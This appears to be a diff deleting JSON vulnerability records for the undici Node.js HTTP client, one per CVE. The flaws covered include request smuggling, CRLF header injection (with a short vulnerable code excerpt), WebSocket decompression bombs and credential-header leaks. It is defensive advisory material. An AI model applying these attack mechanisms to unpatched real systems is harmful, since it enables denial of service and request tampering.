"https://github.com/nodejs/undici/commit/e041de359221ebeae04c469e8aff4145764e6d76",
"https://hackerone.com/reports/2166948",
"https://github.com/nodejs/undici",
"https://github.com/nodejs/undici/releases/tag/v5.26.2",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3N4NJ7FR4X4FPZUGNTQAPSTVB2HB2Y4A",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/E72T67UPDRXHIDLO3OROR25YAMN4GGW5",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FNA62Q767CFAFHBCDKYNPBMZWB7TWYVU",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HT7T2R4MQKLIF4ODV4BDLPARWFPCJ5CZ",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LKYHSZQFDNR7RSA7LHVLLIAQMVYCUGBG",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/X6QXN4ORIVF6XBW4WWFE7VNPVC74S45Y"
],
"aliases": [
"CVE-2023-45143",
"GHSA-wqq4-5wpv-mx2g"
],
"cve_ids": [
"CVE-2023-45143"
],
"ghsa_ids": [
"GHSA-wqq4-5wpv-mx2g"
],
"osv_ids": [
"GHSA-wqq4-5wpv-mx2g"
],
"affected_versions": [
"introduced=0, fixed<5.26.2"
],
"fixed_versions": [
"5.26.2"
],
"package_name": "undici",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2023-45143.md",
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary",
"token-cookie-storage"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "ssrf-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Undici"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,79 +0,0 @@
{
"canonical_id": "undici--CVE-2024-30260",
"system_id": "undici",
"display_name": "Undici",
"category": "frameworks",
"advisory_mode": "core",
"title": "Undici's Proxy-Authorization header not cleared on cross-origin redirect for dispatch, request, stream, pipeline",
"summary": "### Impact\n\nUndici cleared Authorization and Proxy-Authorization headers for `fetch()`, but did not clear them for `undici.request()`.\n\n### Patches\n\nThis has been patched in https://github.com/nodejs/undici/commit/6805746680d27a5369d7fb67bc05f95a28247d75.\nFixes has been released in v5.28.4 and v6.11.1.\n\n### Workarounds\n\nuse `fetch()` or disable `maxRedirections`.\n\n### References\n\nLinzi Shang reported this.\n\n* https://hackerone.com/reports/2408074\n* https://github.com/nodejs/undici/security/advisories/GHSA-3787-6prv-h9w3",
"published_at": "2024-04-04T14:20:39Z",
"updated_at": "2025-11-04T19:44:28Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-m4v8-wqvr-p9f7",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2024-30260",
"https://github.com/nodejs/undici/commit/64e3402da4e032e68de46acb52800c9a06aaea3f",
"https://github.com/nodejs/undici/commit/6805746680d27a5369d7fb67bc05f95a28247d75",
"https://hackerone.com/reports/2408074",
"https://github.com/nodejs/undici",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HQVHWAS6WDXXIU7F72XI55VZ2LTZUB33",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NC3V3HFZ5MOJRZDY5ZELL6REIRSPFROJ",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/P6Q4RGETHVYVHDIQGTJGU5AV6NJEI67E",
"https://security.netapp.com/advisory/ntap-20240905-0008"
],
"aliases": [
"CVE-2024-30260",
"GHSA-m4v8-wqvr-p9f7"
],
"cve_ids": [
"CVE-2024-30260"
],
"ghsa_ids": [
"GHSA-m4v8-wqvr-p9f7"
],
"osv_ids": [
"GHSA-m4v8-wqvr-p9f7"
],
"affected_versions": [
"introduced=0, fixed<5.28.4",
"introduced=6.0.0, fixed<6.11.1"
],
"fixed_versions": [
"5.28.4",
"6.11.1"
],
"package_name": "undici",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2024-30260.md",
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "ssrf-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Undici"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,79 +0,0 @@
{
"canonical_id": "undici--CVE-2024-30261",
"system_id": "undici",
"display_name": "Undici",
"category": "frameworks",
"advisory_mode": "core",
"title": "Undici's fetch with integrity option is too lax when algorithm is specified but hash value is in incorrect",
"summary": "### Impact\n\nIf an attacker can alter the `integrity` option passed to `fetch()`, they can let `fetch()` accept requests as valid even if they have been tampered.\n\n### Patches\n\nFixed in https://github.com/nodejs/undici/commit/d542b8cd39ec1ba303f038ea26098c3f355974f3.\nFixes has been released in v5.28.4 and v6.11.1.\n\n\n### Workarounds\n\nEnsure that `integrity` cannot be tampered with.\n\n### References\n\nhttps://hackerone.com/reports/2377760",
"published_at": "2024-04-04T14:20:54Z",
"updated_at": "2025-11-04T19:44:42Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-9qxr-qj54-h672",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2024-30261",
"https://github.com/nodejs/undici/commit/2b39440bd9ded841c93dd72138f3b1763ae26055",
"https://github.com/nodejs/undici/commit/d542b8cd39ec1ba303f038ea26098c3f355974f3",
"https://hackerone.com/reports/2377760",
"https://github.com/nodejs/undici",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HQVHWAS6WDXXIU7F72XI55VZ2LTZUB33",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NC3V3HFZ5MOJRZDY5ZELL6REIRSPFROJ",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/P6Q4RGETHVYVHDIQGTJGU5AV6NJEI67E",
"https://security.netapp.com/advisory/ntap-20240905-0008"
],
"aliases": [
"CVE-2024-30261",
"GHSA-9qxr-qj54-h672"
],
"cve_ids": [
"CVE-2024-30261"
],
"ghsa_ids": [
"GHSA-9qxr-qj54-h672"
],
"osv_ids": [
"GHSA-9qxr-qj54-h672"
],
"affected_versions": [
"introduced=0, fixed<5.28.4",
"introduced=6.0.0, fixed<6.11.1"
],
"fixed_versions": [
"5.28.4",
"6.11.1"
],
"package_name": "undici",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2024-30261.md",
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "ssrf-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Undici"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,80 +0,0 @@
{
"canonical_id": "undici--CVE-2025-22150",
"system_id": "undici",
"display_name": "Undici",
"category": "frameworks",
"advisory_mode": "core",
"title": "Use of Insufficiently Random Values in undici",
"summary": "### Impact\n\n[Undici `fetch()` uses Math.random()](https://github.com/nodejs/undici/blob/8b06b8250907d92fead664b3368f1d2aa27c1f35/lib/web/fetch/body.js#L113) to choose the boundary for a multipart/form-data request. It is known that the output of Math.random() can be predicted if several of its generated values are known.\n\nIf there is a mechanism in an app that sends multipart requests to an attacker-controlled website, they can use this to leak the necessary values. Therefore, An attacker can tamper with the requests going to the backend APIs if certain conditions are met.\n\n### Patches\n\nThis is fixed in 5.28.5; 6.21.1; 7.2.3.\n\n### Workarounds\n\nDo not issue multipart requests to attacker controlled servers.\n\n### References\n\n* https://hackerone.com/reports/2913312\n* https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f\n",
"published_at": "2025-01-21T21:10:47Z",
"updated_at": "2026-02-04T02:29:26.373390Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-c76h-2ccp-4975",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-22150",
"https://github.com/nodejs/undici/commit/711e20772764c29f6622ddc937c63b6eefdf07d0",
"https://github.com/nodejs/undici/commit/c2d78cd19fe4f4c621424491e26ce299e65e934a",
"https://github.com/nodejs/undici/commit/c3acc6050b781b827d80c86cbbab34f14458d385",
"https://hackerone.com/reports/2913312",
"https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f",
"https://github.com/nodejs/undici",
"https://github.com/nodejs/undici/blob/8b06b8250907d92fead664b3368f1d2aa27c1f35/lib/web/fetch/body.js#L113"
],
"aliases": [
"CVE-2025-22150",
"GHSA-c76h-2ccp-4975"
],
"cve_ids": [
"CVE-2025-22150"
],
"ghsa_ids": [
"GHSA-c76h-2ccp-4975"
],
"osv_ids": [
"GHSA-c76h-2ccp-4975"
],
"affected_versions": [
"introduced=4.5.0, fixed<5.28.5",
"introduced=6.0.0, fixed<6.21.1",
"introduced=7.0.0, fixed<7.2.3"
],
"fixed_versions": [
"5.28.5",
"6.21.1",
"7.2.3"
],
"package_name": "undici",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2025-22150.md",
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "ssrf-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Undici"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,77 +0,0 @@
{
"canonical_id": "undici--CVE-2025-47279",
"system_id": "undici",
"display_name": "Undici",
"category": "frameworks",
"advisory_mode": "core",
"title": "undici Denial of Service attack via bad certificate data",
"summary": "### Impact\n\nApplications that use undici to implement a webhook-like system are vulnerable. If the attacker set up a server with an invalid certificate, and they can force the application to call the webhook repeatedly, then they can cause a memory leak. \n\n### Patches\n\nThis has been patched in https://github.com/nodejs/undici/pull/4088.\n\n### Workarounds\n\nIf a webhook fails, avoid keep calling it repeatedly.\n\n### References\n\nReported as: https://github.com/nodejs/undici/issues/3895",
"published_at": "2025-05-15T14:15:06Z",
"updated_at": "2026-02-06T22:08:08.311705Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-cxrh-j4jr-qwg3",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-47279",
"https://github.com/nodejs/undici/issues/3895",
"https://github.com/nodejs/undici/pull/4088",
"https://github.com/nodejs/undici/commit/f317618ec28753a4218beccea048bcf89c36db25",
"https://github.com/nodejs/undici"
],
"aliases": [
"CVE-2025-47279",
"GHSA-cxrh-j4jr-qwg3"
],
"cve_ids": [
"CVE-2025-47279"
],
"ghsa_ids": [
"GHSA-cxrh-j4jr-qwg3"
],
"osv_ids": [
"GHSA-cxrh-j4jr-qwg3"
],
"affected_versions": [
"introduced=0, fixed<5.29.0",
"introduced=6.0.0, fixed<6.21.2",
"introduced=7.0.0, fixed<7.5.0"
],
"fixed_versions": [
"5.29.0",
"6.21.2",
"7.5.0"
],
"package_name": "undici",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2025-47279.md",
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "ssrf-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Undici"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,77 +0,0 @@
{
"canonical_id": "undici--CVE-2026-1525",
"system_id": "undici",
"display_name": "Undici",
"category": "frameworks",
"advisory_mode": "core",
"title": "Undici has an HTTP Request/Response Smuggling issue",
"summary": "### Impact\n\nUndici allows duplicate HTTP `Content-Length` headers when they are provided in an array with case-variant names (e.g., `Content-Length` and `content-length`). This produces malformed HTTP/1.1 requests with multiple conflicting `Content-Length` values on the wire.\n\n**Who is impacted:**\n - Applications using `undici.request()`, `undici.Client`, or similar low-level APIs with headers passed as flat arrays\n - Applications that accept user-controlled header names without case-normalization\n\n**Potential consequences:**\n - **Denial of Service**: Strict HTTP parsers (proxies, servers) will reject requests with duplicate `Content-Length` headers (400 Bad Request)\n - **HTTP Request Smuggling**: In deployments where an intermediary and backend interpret duplicate headers inconsistently (e.g., one uses the first value, the other uses the last), this can enable request smuggling attacks leading to ACL bypass, cache poisoning, or credential hijacking\n\n### Patches\n\n Patched in the undici version v7.24.0 and v6.24.0. Users should upgrade to this version or later.\n\n### Workarounds\n\n If upgrading is not immediately possible:\n\n 1. **Validate header names**: Ensure no duplicate `Content-Length` headers (case-insensitive) are present before passing headers to undici\n 2. **Use object format**: Pass headers as a plain object (`{ 'content-length': '123' }`) rather than an array, which naturally deduplicates by key\n 3. **Sanitize user input**: If headers originate from user input, normalize header names to lowercase and reject duplicates",
"published_at": "2026-03-13T20:07:03Z",
"updated_at": "2026-03-14T09:19:54.772219Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-2mjp-6q6p-2qxm",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-1525",
"https://hackerone.com/reports/3556037",
"https://cna.openjsf.org/security-advisories.html",
"https://cwe.mitre.org/data/definitions/444.html",
"https://github.com/nodejs/undici",
"https://www.rfc-editor.org/rfc/rfc9110.html#section-8.6"
],
"aliases": [
"CVE-2026-1525",
"GHSA-2mjp-6q6p-2qxm"
],
"cve_ids": [
"CVE-2026-1525"
],
"ghsa_ids": [
"GHSA-2mjp-6q6p-2qxm"
],
"osv_ids": [
"GHSA-2mjp-6q6p-2qxm"
],
"affected_versions": [
"introduced=0, fixed<6.24.0",
"introduced=7.0.0, fixed<7.24.0"
],
"fixed_versions": [
"6.24.0",
"7.24.0"
],
"package_name": "undici",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2026-1525.md",
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary",
"request-smuggling-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "ssrf-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Undici"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,77 +0,0 @@
{
"canonical_id": "undici--CVE-2026-1526",
"system_id": "undici",
"display_name": "Undici",
"category": "frameworks",
"advisory_mode": "core",
"title": "Undici has Unbounded Memory Consumption in WebSocket permessage-deflate Decompression",
"summary": "## Description\n\nThe undici WebSocket client is vulnerable to a denial-of-service attack via unbounded memory consumption during permessage-deflate decompression. When a WebSocket connection negotiates the permessage-deflate extension, the client decompresses incoming compressed frames without enforcing any limit on the decompressed data size. A malicious WebSocket server can send a small compressed frame (a \"decompression bomb\") that expands to an extremely large size in memory, causing the Node.js process to exhaust available memory and crash or become unresponsive.\n\nThe vulnerability exists in the `PerMessageDeflate.decompress()` method, which accumulates all decompressed chunks in memory and concatenates them into a single Buffer without checking whether the total size exceeds a safe threshold.\n\n## Impact\n\n- Remote denial of service against any Node.js application using undici's WebSocket client\n- A single compressed WebSocket frame of ~6 MB can decompress to ~1 GB or more\n- Memory exhaustion occurs in native/external memory, bypassing V8 heap limits\n- No application-level mitigation is possible as decompression occurs before message delivery\n\n### Patches\n\nUsers should upgrade to fixed versions.\n\n### Workarounds\n\nNo workaround are possible.",
"published_at": "2026-03-13T20:41:56Z",
"updated_at": "2026-03-13T20:54:25.563997Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-vrm6-8vpv-qv8q",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-1526",
"https://hackerone.com/reports/3481206",
"https://cna.openjsf.org/security-advisories.html",
"https://datatracker.ietf.org/doc/html/rfc7692",
"https://github.com/nodejs/undici",
"https://owasp.org/www-community/attacks/Denial_of_Service"
],
"aliases": [
"CVE-2026-1526",
"GHSA-vrm6-8vpv-qv8q"
],
"cve_ids": [
"CVE-2026-1526"
],
"ghsa_ids": [
"GHSA-vrm6-8vpv-qv8q"
],
"osv_ids": [
"GHSA-vrm6-8vpv-qv8q"
],
"affected_versions": [
"introduced=0, fixed<6.24.0",
"introduced=7.0.0, fixed<7.24.0"
],
"fixed_versions": [
"6.24.0",
"7.24.0"
],
"package_name": "undici",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2026-1526.md",
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary",
"plugin-extension-trust-policy"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "ssrf-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Undici"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,74 +0,0 @@
{
"canonical_id": "undici--CVE-2026-1527",
"system_id": "undici",
"display_name": "Undici",
"category": "frameworks",
"advisory_mode": "core",
"title": "Undici has CRLF Injection in undici via `upgrade` option",
"summary": "### Impact\n\nWhen an application passes user-controlled input to the `upgrade` option of `client.request()`, an attacker can inject CRLF sequences (`\\r\\n`) to:\n\n1. Inject arbitrary HTTP headers\n2. Terminate the HTTP request prematurely and smuggle raw data to non-HTTP services (Redis, Memcached, Elasticsearch)\n\nThe vulnerability exists because undici writes the `upgrade` value directly to the socket without validating for invalid header characters:\n\n```javascript\n// lib/dispatcher/client-h1.js:1121\nif (upgrade) {\n header += `connection: upgrade\\r\\nupgrade: ${upgrade}\\r\\n`\n}\n```\n\n### Patches\n\n Patched in the undici version v7.24.0 and v6.24.0. Users should upgrade to this version or later.\n\n### Workarounds\n\nSanitize the `upgrade` option string before passing to undici:\n\n```javascript\nfunction sanitizeUpgrade(value) {\n if (/[\\r\\n]/.test(value)) {\n throw new Error('Invalid upgrade value')\n }\n return value\n}\n\nclient.request({\n upgrade: sanitizeUpgrade(userInput)\n})\n```",
"published_at": "2026-03-13T20:41:26Z",
"updated_at": "2026-03-13T20:54:25.572106Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-4992-7rv2-5pvq",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-1527",
"https://hackerone.com/reports/3487198",
"https://cna.openjsf.org/security-advisories.html",
"https://github.com/nodejs/undici"
],
"aliases": [
"CVE-2026-1527",
"GHSA-4992-7rv2-5pvq"
],
"cve_ids": [
"CVE-2026-1527"
],
"ghsa_ids": [
"GHSA-4992-7rv2-5pvq"
],
"osv_ids": [
"GHSA-4992-7rv2-5pvq"
],
"affected_versions": [
"introduced=0, fixed<6.24.0",
"introduced=7.0.0, fixed<7.24.0"
],
"fixed_versions": [
"6.24.0",
"7.24.0"
],
"package_name": "undici",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2026-1527.md",
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "ssrf-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Undici"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,74 +0,0 @@
{
"canonical_id": "undici--CVE-2026-1528",
"system_id": "undici",
"display_name": "Undici",
"category": "frameworks",
"advisory_mode": "core",
"title": "Undici: Malicious WebSocket 64-bit length overflows parser and crashes the client",
"summary": "### Impact\nA server can reply with a WebSocket frame using the 64-bit length form and an extremely large length. undici's ByteParser overflows internal math, ends up in an invalid state, and throws a fatal TypeError that terminates the process. \n\n### Patches\n\n\n Patched in the undici version v7.24.0 and v6.24.0. Users should upgrade to this version or later.\n\n### Workarounds\n\nThere are no workarounds.",
"published_at": "2026-03-13T20:07:26Z",
"updated_at": "2026-03-14T09:17:45.838435Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-f269-vfmq-vjvj",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-1528",
"https://hackerone.com/reports/3537648",
"https://cna.openjsf.org/security-advisories.html",
"https://github.com/nodejs/undici"
],
"aliases": [
"CVE-2026-1528",
"GHSA-f269-vfmq-vjvj"
],
"cve_ids": [
"CVE-2026-1528"
],
"ghsa_ids": [
"GHSA-f269-vfmq-vjvj"
],
"osv_ids": [
"GHSA-f269-vfmq-vjvj"
],
"affected_versions": [
"introduced=6.0.0, fixed<6.24.0",
"introduced=7.0.0, fixed<7.24.0"
],
"fixed_versions": [
"6.24.0",
"7.24.0"
],
"package_name": "undici",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2026-1528.md",
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "ssrf-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Undici"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,73 +0,0 @@
{
"canonical_id": "undici--CVE-2026-22036",
"system_id": "undici",
"display_name": "Undici",
"category": "frameworks",
"advisory_mode": "core",
"title": "Undici has an unbounded decompression chain in HTTP responses on Node.js Fetch API via Content-Encoding leads to resource exhaustion",
"summary": "### Impact\n\nThe `fetch()` API supports chained HTTP encoding algorithms for response content according to RFC 9110 (e.g., Content-Encoding: gzip, br). This is also supported by the undici decompress interceptor.\n\nHowever, the number of links in the decompression chain is unbounded and the default maxHeaderSize allows a malicious server to insert thousands compression steps leading to high CPU usage and excessive memory allocation.\n\n### Patches\n\nUpgrade to 7.18.2 or 6.23.0.\n\n### Workarounds\n\nIt is possible to apply an undici interceptor and filter long `Content-Encoding` sequences manually.\n\n### References\n\n* https://hackerone.com/reports/3456148\n* https://github.com/advisories/GHSA-gm62-xv2j-4w53\n* https://curl.se/docs/CVE-2022-32206.html",
"published_at": "2026-01-14T21:06:08Z",
"updated_at": "2026-02-04T02:56:17.456091Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-g9mf-h72j-4rw9",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-22036",
"https://github.com/nodejs/undici/commit/b04e3cbb569c1596f86c108e9b52c79d8475dcb3",
"https://github.com/nodejs/undici"
],
"aliases": [
"CVE-2026-22036",
"GHSA-g9mf-h72j-4rw9"
],
"cve_ids": [
"CVE-2026-22036"
],
"ghsa_ids": [
"GHSA-g9mf-h72j-4rw9"
],
"osv_ids": [
"GHSA-g9mf-h72j-4rw9"
],
"affected_versions": [
"introduced=7.0.0, fixed<7.18.2",
"introduced=0, fixed<6.23.0"
],
"fixed_versions": [
"7.18.2",
"6.23.0"
],
"package_name": "undici",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2026-22036.md",
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "ssrf-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Undici"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,77 +0,0 @@
{
"canonical_id": "undici--CVE-2026-2229",
"system_id": "undici",
"display_name": "Undici",
"category": "frameworks",
"advisory_mode": "core",
"title": "Undici has Unhandled Exception in WebSocket Client Due to Invalid server_max_window_bits Validation",
"summary": "### Impact\n\nThe undici WebSocket client is vulnerable to a denial-of-service attack due to improper validation of the `server_max_window_bits` parameter in the permessage-deflate extension. When a WebSocket client connects to a server, it automatically advertises support for permessage-deflate compression. A malicious server can respond with an out-of-range `server_max_window_bits` value (outside zlib's valid range of 8-15). When the server subsequently sends a compressed frame, the client attempts to create a zlib InflateRaw instance with the invalid windowBits value, causing a synchronous RangeError exception that is not caught, resulting in immediate process termination.\n\nThe vulnerability exists because:\n\n1. The `isValidClientWindowBits()` function only validates that the value contains ASCII digits, not that it falls within the valid range 8-15\n2. The `createInflateRaw()` call is not wrapped in a try-catch block\n3. The resulting exception propagates up through the call stack and crashes the Node.js process\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_",
"published_at": "2026-03-13T20:41:41Z",
"updated_at": "2026-03-13T20:54:26.149214Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-v9p9-hfj2-hcw8",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-2229",
"https://hackerone.com/reports/3487486",
"https://cna.openjsf.org/security-advisories.html",
"https://datatracker.ietf.org/doc/html/rfc7692",
"https://github.com/nodejs/undici",
"https://nodejs.org/api/zlib.html#class-zlibinflateraw"
],
"aliases": [
"CVE-2026-2229",
"GHSA-v9p9-hfj2-hcw8"
],
"cve_ids": [
"CVE-2026-2229"
],
"ghsa_ids": [
"GHSA-v9p9-hfj2-hcw8"
],
"osv_ids": [
"GHSA-v9p9-hfj2-hcw8"
],
"affected_versions": [
"introduced=0, fixed<6.24.0",
"introduced=7.0.0, fixed<7.24.0"
],
"fixed_versions": [
"6.24.0",
"7.24.0"
],
"package_name": "undici",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2026-2229.md",
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary",
"plugin-extension-trust-policy"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "ssrf-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Undici"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,72 +0,0 @@
{
"canonical_id": "undici--CVE-2026-2581",
"system_id": "undici",
"display_name": "Undici",
"category": "frameworks",
"advisory_mode": "core",
"title": "Undici has Unbounded Memory Consumption in its DeduplicationHandler via Response Buffering that leads to DoS",
"summary": "## Impact\nThis is an uncontrolled resource consumption vulnerability (CWE-400) that can lead to Denial of Service (DoS).\n\nIn vulnerable Undici versions, when `interceptors.deduplicate()` is enabled, response data for deduplicated requests could be accumulated in memory for downstream handlers. An attacker-controlled or untrusted upstream endpoint can exploit this with large/chunked responses and concurrent identical requests, causing high memory usage and potential OOM process termination.\n\nImpacted users are applications that use Undici\u2019s deduplication interceptor against endpoints that may produce large or long-lived response bodies.\n\n## Patches\n\nThe issue has been patched by changing deduplication behavior to stream response chunks to downstream handlers as they arrive (instead of full-body accumulation), and by preventing late deduplication when body streaming has already started.\n\nUsers should upgrade to the first official Undici (and Node.js, where applicable) releases that include this patch.\n\n## Workarounds\nIf upgrading immediately is not possible:\n\n- Disable `interceptors.deduplicate()` for affected clients/routes.\n- Use `skipHeaderNames` with a marker header to force high-risk requests to bypass 